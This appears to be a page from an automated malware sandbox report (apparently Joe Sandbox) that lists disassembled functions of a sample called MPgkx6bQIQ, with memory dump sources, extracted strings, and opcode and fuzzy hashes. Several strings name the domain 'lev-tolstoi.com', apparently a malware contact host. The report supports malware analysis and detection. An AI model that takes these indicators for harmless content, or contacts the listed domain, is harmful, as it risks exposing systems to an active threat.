                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                          • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                                          Function 0248D25A Relevance: 6.5, Strings: 5, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: BI$ZG$lev-tolstoi.com$3ej$pr
                                                                                                                                                                                                                                                                                          • API String ID: 0-2504283770
                                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                          • Instruction ID: a9a6a3ce15e73643c5f7d304bcc303a0e0c11b028bf89a3e05b05a354b4b9328
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1E3B56117818FD718CF29C590A26BBF2FF96304B1995AEC0D68F7A6D734E802CB10
                                                                                                                                                                                                                                                                                          Function 0249E1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                                          • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                          • Instruction ID: 43ffbaf601dac67dac3f7de494ab11fd7e8a36768a23bc975a14dbd97ed775c7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B64207706083908FCB25DF68C85076FBFE1AF96214F484A6EE8E55B392D7368506CB52
                                                                                                                                                                                                                                                                                          Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                                          • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                                          • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                                          • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                                          Function 024AB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                          • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                          • Instruction ID: 4dd9865bf480284b995dc2ebb7bbcf1d26dc5a7906ebf95f37f46a381d06ec2e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDE1E97111D3C18BE765CF29C4617BBBBD6EFA2208F18896ED0D987792D739810AC712
                                                                                                                                                                                                                                                                                          Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                          • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                          • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                          • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                                          Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                                          • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                                          • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                                          • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                                          Function 00423410 Relevance: 5.4, Strings: 4, Instructions: 415COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                                                          • API String ID: 0-1090792222
                                                                                                                                                                                                                                                                                          • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                                          • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                                                          Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                          • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                                          Function 0249C1AC Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                                                          • API String ID: 0-2105564891
                                                                                                                                                                                                                                                                                          • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                                          • Instruction ID: 83feb89783d0e8e03a0af41f1f5f3833bcca062e61b7e43a27f1168e45b05c3c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7081DCB264C3509FD708CFA9C85185FFBE2EFD5300F59886DE0E58B251D67996068B82
                                                                                                                                                                                                                                                                                          Function 024B6107 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                                          • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                                          • Instruction ID: b5b315cef96ff8e6603068b3171df72a60ff363c6aba796a5bcb627c89a6e68a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1A1053150C7908AD3069B3898502AFBBD65FC6328F0A4B2EE5E6473D2D675C585C726
                                                                                                                                                                                                                                                                                          Function 00435EA0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                                          • Opcode ID: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                                          • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                                                          Function 0248DF8C Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                          • Instruction ID: 509d1b93eee6ce9a1ae496d8d3fcf9a0424700ff1f041aaa68fc307b5d1c2203
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64A113B46187918FD326CF39C4A0A66BFE1EF57204B18869DD8D24FB66D339D406CB11
                                                                                                                                                                                                                                                                                          Function 0040DD25 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                          • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                                          Function 004156A0 Relevance: 4.4, Strings: 3, Instructions: 617COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                                                          • API String ID: 0-2624003027
                                                                                                                                                                                                                                                                                          • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                                          • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                                                                                                                                                                                                                                                          Function 0249144C Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$V$e
                                                                                                                                                                                                                                                                                          • API String ID: 0-3964817793
                                                                                                                                                                                                                                                                                          • Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                                                          • Instruction ID: 423e8a31a579725d416adccb6ed0b35f1c0f6d461923490d9d1b775acc227a10
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E922D57260C7818BD7249B39C4943AEBFD2ABC5320F194A6ED5ED873D1DA748941CB42
                                                                                                                                                                                                                                                                                          Function 004111E5 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$V$e
                                                                                                                                                                                                                                                                                          • API String ID: 0-3964817793
                                                                                                                                                                                                                                                                                          • Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                                                          • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                                                                                                                                                                                                                                                          Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                                          • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                                          • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                                          Function 024987DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                                          • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                                          • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                          • Instruction ID: 7315892df1c7d2f6982ff7657606a7d3c234dbfdcb31354e0a536e57fada5f92
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5581CE756007128FCB28CF29C890A67BBF2FF96710B19859DD8824FB65E734E841CB55
                                                                                                                                                                                                                                                                                          Function 0248092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
